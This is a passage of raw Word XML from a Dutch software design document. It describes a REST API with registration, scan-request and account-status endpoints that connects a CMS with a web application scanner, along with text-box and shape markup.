                              <w:t>Een communicatiemiddel tussen de Client en de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69ADE9" id="Text Box 247" o:spid="_x0000_s1067" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-25.8pt;margin-top:119.85pt;width:445.05pt;height:27pt;z-index:25200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u42IsCAACNBQAADgAAAGRycy9lMm9Eb2MueG1srFRLbxoxEL5X6n+wfC8LBJIGZYkoEVUllERN&#10;qpyN1w5WbY9rG3bpr+/Yu0tQmkuqXnbHM9+8H1fXjdFkL3xQYEs6GgwpEZZDpexzSX88rj59piRE&#10;ZiumwYqSHkSg1/OPH65qNxNj2IKuhCdoxIZZ7Uq6jdHNiiLwrTAsDMAJi0IJ3rCIT/9cVJ7VaN3o&#10;Yjwcnhc1+Mp54CIE5N60QjrP9qUUPN5JGUQkuqQYW8xfn7+b9C3mV2z27JnbKt6Fwf4hCsOURadH&#10;UzcsMrLz6i9TRnEPAWQccDAFSKm4yDlgNqPhq2wetsyJnAsWJ7hjmcL/M8tv9/eeqKqk48kFJZYZ&#10;bNKjaCL5Ag1JPKxQ7cIMgQ8OobFBAXa65wdkpsQb6U36Y0oE5Vjrw7G+yRxH5vR8Oh6dTSnhKDub&#10;jC+HuQHFi7bzIX4VYEgiSuqxf7msbL8OESNBaA9JziyslNa5h9omRgCtqsTLjzREYqk92TNsf2xy&#10;0GjiBIWvVlPkYem8pITbxDIVD1okg9p+FxKLlfN7wwPjXNjYe8nohJIYz3sUO3xSbaN6j/JRI3sG&#10;G4/KRlnwuZp5u14KU/3sQ5YtHut8knciY7Np8pScTfrGb6A64Dx4aHcqOL5S2LQ1C/GeeVwiHAE8&#10;DPEOP1JDXVLoKEq24H+/xU94nG2UUlLjUpY0/NoxLyjR3yxO/eVoMklbnB+T6cUYH/5UsjmV2J1Z&#10;AjZ+hCfI8UwmfNQ9KT2YJ7wfi+QVRcxy9I2T0pPL2J4KvD9cLBYZhHvrWFzbB8eT6VTmNJKPzRPz&#10;rpvbiBN/C/36stmr8W2xSdPCYhdBqjzbqdBtVbsG4M7nke/uUzoqp++Mermi8z8AAAD//wMAUEsD&#10;BBQABgAIAAAAIQApiHTK4wAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BboJAEIbvTfoOm2nS&#10;my5KBKQsptWYNMYe1Mb0uMIUSNlZwq6Kb9/x1B5n5ss/358tBtOKC/ausaRgMg5AIBW2bKhS8HlY&#10;jxIQzmsqdWsJFdzQwSJ/fMh0Wtor7fCy95XgEHKpVlB736VSuqJGo93Ydkh8+7a90Z7HvpJlr68c&#10;blo5DYJIGt0Qf6h1h8sai5/92Sh4P9w2u3j5EZnN2+pre5TuuF5tlXp+Gl5fQHgc/B8Md31Wh5yd&#10;TvZMpROtgtFsEjGqYBrOYxBMJGEyA3HizTyMQeaZ/N8h/wUAAP//AwBQSwECLQAUAAYACAAAACEA&#10;5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQA&#10;BgAIAAAAIQAjsmrh1wAAAJQBAAALAAAAAAAAAAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQA&#10;BgAIAAAAIQApW7jYiwIAAI0FAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQIt&#10;ABQABgAIAAAAIQApiHTK4wAAAAsBAAAPAAAAAAAAAAAAAAAAAOMEAABkcnMvZG93bnJldi54bWxQ&#10;SwUGAAAAAAQABADzAAAA8wUAAAAA&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2BD940F9" w14:textId="252DC9B5" w:rsidR="00CE4BB5" w:rsidRPr="00AA65F4" w:rsidRDefault="00CE4BB5" w:rsidP="00FB7A00">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Business </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Doel</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve">: </w:t>
                      </w:r>
                      <w:r>
                        <w:t>Een communicatiemiddel tussen de Client en de Server</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9C12B0" w14:textId="77777777" w:rsidR="00FB7A00" w:rsidRDefault="00FB7A00" w:rsidP="009276BC"/>
    <w:p w14:paraId="2AC7406C" w14:textId="77777777" w:rsidR="009E30CF" w:rsidRDefault="009E30CF" w:rsidP="009276BC"/>
    <w:p w14:paraId="4955058A" w14:textId="7BAB2BAA" w:rsidR="000077DA" w:rsidRDefault="00076784" w:rsidP="009276BC">
      <w:r>
        <w:t>De API</w:t>
      </w:r>
      <w:r w:rsidR="00E20319">
        <w:t xml:space="preserve"> is van de soort REST API (bijlage, Rest API) en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is een </w:t>
      </w:r>
      <w:r w:rsidR="00953BAB">
        <w:t>essentiële deel van het systeem, het maakt de communicatie t</w:t>
      </w:r>
      <w:r w:rsidR="00386B03">
        <w:t xml:space="preserve">ussen twee subsystemen, CMS en </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r w:rsidR="006B2E61">
        <w:t>, mogelijk.</w:t>
      </w:r>
      <w:r w:rsidR="000A47A3">
        <w:t xml:space="preserve"> De communicatie is tweezijdig, dat betekent dat het systeem</w:t>
      </w:r>
      <w:r w:rsidR="00A343C0">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="000A47A3">
        <w:t xml:space="preserve"> functie kan u</w:t>
      </w:r>
      <w:r w:rsidR="00A343C0">
        <w:t xml:space="preserve">itvoeren van de CMS en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A343C0">
        <w:t>vice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A343C0">
        <w:t xml:space="preserve"> versa. </w:t>
      </w:r>
      <w:r w:rsidR="00F438F9">
        <w:t>De API heeft een aantal gedefinieerde functie die handelingen u</w:t>
      </w:r>
      <w:r w:rsidR="000A47A3">
        <w:t xml:space="preserve">itvoeren </w:t>
      </w:r>
      <w:r w:rsidR="000277DD">
        <w:t>de respectievelijke subsysteem</w:t>
      </w:r>
      <w:r w:rsidR="006F57B1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005C503F">
        <w:t xml:space="preserve"> Bij elke API Call wordt er een HTTP Request </w:t>
      </w:r>
      <w:r w:rsidR="00CE6962">
        <w:t xml:space="preserve">gemaakt </w:t>
      </w:r>
      <w:r w:rsidR="0048579A">
        <w:t xml:space="preserve">naar de server toe </w:t>
      </w:r>
      <w:r w:rsidR="00CE6962">
        <w:t xml:space="preserve">en wordt er een HTTP Response </w:t>
      </w:r>
      <w:r w:rsidR="0048579A">
        <w:t xml:space="preserve">teruggestuurd. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1552"/>
        <w:gridCol w:w="2976"/>
        <w:gridCol w:w="4534"/>
      </w:tblGrid>
      <w:tr w:rsidR="00296E78" w14:paraId="7C8A9B79" w14:textId="77777777" w:rsidTr="00370603">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="7BD6DA88" w14:textId="3379BD56" w:rsidR="00296E78" w:rsidRDefault="00AE6C9B" w:rsidP="009276BC">
            <w:r>
              <w:t>Functie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00296E78" w14:paraId="169C3491" w14:textId="77777777" w:rsidTr="00296E78">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C7B6BC3" w14:textId="3F8A76B7" w:rsidR="00296E78" w:rsidRDefault="00370603" w:rsidP="009276BC">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2976" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55E20CF4" w14:textId="311545A6" w:rsidR="00296E78" w:rsidRDefault="00DF60BE" w:rsidP="009276BC">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4534" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C17C2E2" w14:textId="181DAC6D" w:rsidR="00296E78" w:rsidRDefault="00DF60BE" w:rsidP="009276BC">
            <w:r>
              <w:t>Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00296E78" w14:paraId="248E88FC" w14:textId="77777777" w:rsidTr="00296E78">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="019957B3" w14:textId="0C3E975F" w:rsidR="00296E78" w:rsidRDefault="00370603" w:rsidP="009276BC">
            <w:r>
              <w:t>POST</w:t>
            </w:r>
            <w:r w:rsidR="00C348F1">
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2976" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72C62A44" w14:textId="220A3FE1" w:rsidR="00296E78" w:rsidRDefault="00DF60BE" w:rsidP="009276BC">
            <w:r>
              <w:t>/registratie-account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4534" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37507468" w14:textId="791ABE7C" w:rsidR="00296E78" w:rsidRDefault="003F1428" w:rsidP="009276BC">
            <w:r>
              <w:t>Verzend de klantengegevens naar het WAS</w:t>
            </w:r>
            <w:r w:rsidRPr="003F1428">
              <w:rPr>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00296E78" w14:paraId="5448561C" w14:textId="77777777" w:rsidTr="00DF60BE">
        <w:trPr>
          <w:trHeight w:val="194"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B29DECD" w14:textId="6EE43FC7" w:rsidR="00296E78" w:rsidRDefault="00370603" w:rsidP="009276BC">
            <w:r>
              <w:t>POST</w:t>
            </w:r>
            <w:r w:rsidR="00C348F1">
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2976" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60551B3D" w14:textId="0B5DF5D2" w:rsidR="00296E78" w:rsidRDefault="00DF60BE" w:rsidP="009276BC">
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00C348F1">
              <w:t>aanvraag-scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4534" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C02D8EA" w14:textId="38DFF2B2" w:rsidR="00296E78" w:rsidRDefault="00BE7267" w:rsidP="009276BC">
            <w:r>
              <w:t>Verzend informatie over aanvrager en scan type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF60BE" w14:paraId="43565A44" w14:textId="77777777" w:rsidTr="00DF60BE">
        <w:trPr>
          <w:trHeight w:val="194"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EEA1DC5" w14:textId="68818718" w:rsidR="00DF60BE" w:rsidRDefault="00DF60BE" w:rsidP="009276BC">
            <w:r>
              <w:t>GET</w:t>
            </w:r>
            <w:r w:rsidR="00C348F1">
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2976" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1684CA70" w14:textId="4C2884FA" w:rsidR="00DF60BE" w:rsidRDefault="00C348F1" w:rsidP="009276BC">
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>account-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>status?id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>=</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4534" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F56E32E" w14:textId="715AD8EE" w:rsidR="00DF60BE" w:rsidRDefault="00F36D78" w:rsidP="009276BC">
            <w:r>
              <w:t>Geeft de status van een account terug</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="561003FB" w14:textId="06DE54C2" w:rsidR="00ED61CF" w:rsidRDefault="00086EA1" w:rsidP="009276BC">
      <w:r>
        <w:t>Tabel 4.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A12B3F" w14:textId="0CA43EDA" w:rsidR="00122F8D" w:rsidRDefault="003F1428" w:rsidP="009276BC">
      <w:r w:rsidRPr="003F1428">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B87D1A" w14:textId="18BE4BBD" w:rsidR="00CF4D43" w:rsidRDefault="00A1132C" w:rsidP="009276BC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Request </w:t>
      </w:r>
      <w:r w:rsidR="00EF2056">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00EF2056" w:rsidRPr="001454C5">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>cenario’s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1024CFFA" w14:textId="766D3400" w:rsidR="0017698E" w:rsidRPr="006856B7" w:rsidRDefault="00853C64" w:rsidP="009276BC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>De Request Scenario</w:t>
      </w:r>
      <w:r w:rsidR="00AB2671">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00AB2671">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> beschrijven de verschillende </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AB2671">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>uikomsten</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AB2671">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> van een HTTP Request van een API Call.</w:t>
      </w:r>
      <w:r w:rsidR="00687B56">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644F2CDA" w14:textId="1EF6D1CB" w:rsidR="00D33318" w:rsidRDefault="004F0895" w:rsidP="009276BC">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251917312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="034DEA78" wp14:editId="11162F67">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-390525</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>320675</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5842000" cy="231140"/>
                <wp:effectExtent l="0" t="0" r="25400" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="469" name="Text Box 469"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5842000" cy="231140"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="accent6">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C2572A3" w14:textId="3637FB0C" w:rsidR="00CE4BB5" w:rsidRPr="00020970" w:rsidRDefault="00CE4BB5">
                            <w:r w:rsidRPr="00020970">
                              <w:t xml:space="preserve">Succesvol </w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r w:rsidRPr="00020970">
                              <w:t>POST</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidRPr="00020970">
                              <w:t xml:space="preserve">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DEA78" id="Text Box 469" o:spid="_x0000_s1068" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-30.75pt;margin-top:25.25pt;width:460pt;height:18.2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uWVA6cCAAD0BQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtIW0oHFSnqQEyTGKDB&#10;xLPr2DSa7fPsa5vy1+/sJKVjmyamvSTn+77ffZyeNdawtQqxBlfy4cGAM+UkVLV7LPnX+8t3x5xF&#10;FK4SBpwq+VZFfjZ7++Z046dqBEswlQqMnLg43fiSLxH9tCiiXCor4gF45UioIViB9AyPRRXEhrxb&#10;U4wGg0mxgVD5AFLFSNyLVshn2b/WSuKN1lEhMyWn3DB/Q/4u0reYnYrpYxB+WcsuDfEPWVhROwq6&#10;c3UhULBVqH9xZWsZIILGAwm2AK1rqXINVM1w8KKau6XwKtdC4ES/gyn+P7fyen0bWF2VfDw54cwJ&#10;S026Vw2yD9CwxCOENj5OSfHOkyo2JKBO9/xIzFR4o4NNfyqJkZyw3u7wTe4kMY+Ox9QzEkmSjQ6H&#10;w3FuQPFs7UPEjwosS0TJA/UvwyrWVxEpE1LtVVKwCKauLmtj8iPNjDo3ga0FdVtIqRxOsrlZ2c9Q&#10;tfwxZdD1ndg0HS170rMpRJ6+5CkH/CmIcX+Li03GJrl5zo5eraXKM9kVk3Bt8csUbo1K3o37ojT1&#10;JMP4x8r6KFk7aWnC4TWGnX4ybbN6jfHOIkcGhztjWzsIGfUdjC3C1bc+Zd3qE7p7dScSm0WTh/Hw&#10;qJ+vBVRbGrsA7epGLy9rmo0rEfFWBNpVGie6P3hDH21gU3LoKM6WEJ5+x0/6tEIk5WxDu1/y+H0l&#10;guLMfHK0XCfDMU0mw/wYH70f0SPsSxb7Erey50ADN6RL52Umkz6antQB7AOdqXmKSiLhJMUuOfbk&#10;ObYXic6cVPN5VqLz4AVeuTsvk+sEc5r8++ZBBN+tB9JiXUN/JcT0xZa0usnSwXyFoOu8QgnoFtWu&#10;AXRa8qB3ZzDdrv131no+1rMfAAAA//8DAFBLAwQUAAYACAAAACEAon8cPtsAAAAJAQAADwAAAGRy&#10;cy9kb3ducmV2LnhtbEyPQU/DMAyF70j8h8hI3La0k1pCaToNpJ2nDi7cssa0FY1TNWlX/v3MCU5+&#10;lp+ev1fuVzeIBafQe9KQbhMQSI23PbUaPt6PGwUiREPWDJ5Qww8G2Ff3d6UprL9Sjcs5toJDKBRG&#10;QxfjWEgZmg6dCVs/IvHty0/ORF6nVtrJXDncDXKXJLl0pif+0JkR3zpsvs+z03A41c38lCqFu2xd&#10;8LPuIh5ftX58WA8vICKu8c8Mv/iMDhUzXfxMNohBwyZPM7ZqyBKebFCZYnFhkT+DrEr5v0F1AwAA&#10;//8DAFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVu&#10;dF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAAAAAAAAAALAEA&#10;AF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAN7llQOnAgAA9AUAAA4AAAAAAAAAAAAAAAAALAIA&#10;AGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAKJ/HD7bAAAACQEAAA8AAAAAAAAAAAAAAAAA&#10;/wQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAHBgAAAAA=&#10;" fillcolor="#c5e0b3 [1305]" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6C2572A3" w14:textId="3637FB0C" w:rsidR="00CE4BB5" w:rsidRPr="00020970" w:rsidRDefault="00CE4BB5">
                      <w:r w:rsidRPr="00020970">
                        <w:t xml:space="preserve">Succesvol </w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidRPr="00020970">
                        <w:t>POST</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="00020970">
                        <w:t xml:space="preserve"> Request</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0017698E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Registratie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0BC03F" w14:textId="576C5E3C" w:rsidR="005F24D4" w:rsidRDefault="007E6300" w:rsidP="009276BC">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251914240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7FDB1BD7" wp14:editId="59BECCD6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5643245</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>925830</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55" name="Curved Left Arrow 55"/>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E7CC42C"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55" o:spid="_x0000_s1026" type="#_x0000_t103" style="position:absolute;margin-left:444.35pt;margin-top:72.9pt;width:22pt;height:45pt;z-index:251914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bZpsCAADABQAADgAAAGRycy9lMm9Eb2MueG1srFRNb9swDL0P2H8QdF8dB8m6BnWKIEWHAUFb&#10;rB16VmQpNiCLGqXEyX79KNlx+oUNGHaRRZN8JJ9IXl7tG8N2Cn0NtuD52YgzZSWUtd0U/Mfjzacv&#10;nPkgbCkMWFXwg/L8av7xw2XrZmoMFZhSISMQ62etK3gVgptlmZeVaoQ/A6csKTVgIwKJuMlKFC2h&#10;NyYbj0afsxawdAhSeU9/rzslnyd8rZUMd1p7FZgpOOUW0onpXMczm1+K2QaFq2rZpyH+IYtG1JaC&#10;DlDXIgi2xfoNVFNLBA86nEloMtC6lirVQNXko1fVPFTCqVQLkePdQJP/f7DydnePrC4LPp1yZkVD&#10;b7Tc4k6VbKV0YAtEaBnpiKjW+RnZP7h77CVP11j1XmMTv1QP2ydyDwO5ah+YpJ/j84vJiJ5Akmp6&#10;nk/pTijZydmhD18VNCxeCi5TFjGJlENiV+xWPnReR+sY1oOpy5vamCTE1lFLg2wn6NHXm3Ef54WV&#10;sX9zDPv8rSOlGz2zSEVXfLqFg1ERz9jvShObsdyUcOrjUzJCSmVD3qkqUaouR+JiYGPwSNwkwIis&#10;qboBuwd4WegRu6Ont4+uKo3B4Dz6U2Kd8+CRIoMNg3NTW8D3AAxV1Ufu7I8kddREltZQHqjXELoh&#10;9E7e1PTSK+HDvUCaOmoO2iThjg5toC049DfOKsBf7/2P9jQMpOWspSkuuP+5Fag4M98sjclFPpnE&#10;sU/CZHo+JgGfa9bPNXbbLIF6Jqed5WS6RvtgjleN0DzRwlnEqKQSVlJs6tWAR2EZuu1CK0uqxSKZ&#10;0ag7EVb2wckIHlmN7fu4fxLo+nYPNCe3cJx4MXvV6p1t9LSw2AbQdZqDE68937QmUuP0Ky3uoedy&#10;sjot3vlvAAAA//8DAFBLAwQUAAYACAAAACEAkI82Vt0AAAALAQAADwAAAGRycy9kb3ducmV2Lnht&#10;bEyPwU7DMBBE70j8g7VI3KjTFIIJ2VSoEhJF4kCBuxsvSUS8jmK3DX/PcoLjzjzNzlTr2Q/qSFPs&#10;AyMsFxko4ia4nluE97fHKwMqJsvODoEJ4ZsirOvzs8qWLpz4lY671CoJ4VhahC6lsdQ6Nh15Gxdh&#10;JBbvM0zeJjmnVrvJniTcDzrPskJ727N86OxIm46ar93BI7wUJhQ8b80TbTkLerMc++cPxMuL+eEe&#10;VKI5/cHwW1+qQy2d9uHALqoBwRhzK6gY1zeyQYi7VS7KHiFfiaLrSv/fUP8AAAD//wMAUEsBAi0A&#10;FAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54&#10;bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAAAAAAAAAAAAAsAQAAX3JlbHMvLnJl&#10;bHNQSwECLQAUAAYACAAAACEAu/mbZpsCAADABQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0Rv&#10;Yy54bWxQSwECLQAUAAYACAAAACEAkI82Vt0AAAALAQAADwAAAAAAAAAAAAAAAADzBAAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAP0FAAAAAA==&#10;" adj="16320,20280,5400" fillcolor="#e7e6e6 [3214]" strokecolor="black [3213]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00380494">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251912192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4ECE157A" wp14:editId="6937C482">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-391795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1283335</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5874385" cy="904240"/>
                <wp:effectExtent l="0" t="0" r="18415" b="35560"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="51" name="Text Box 51"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
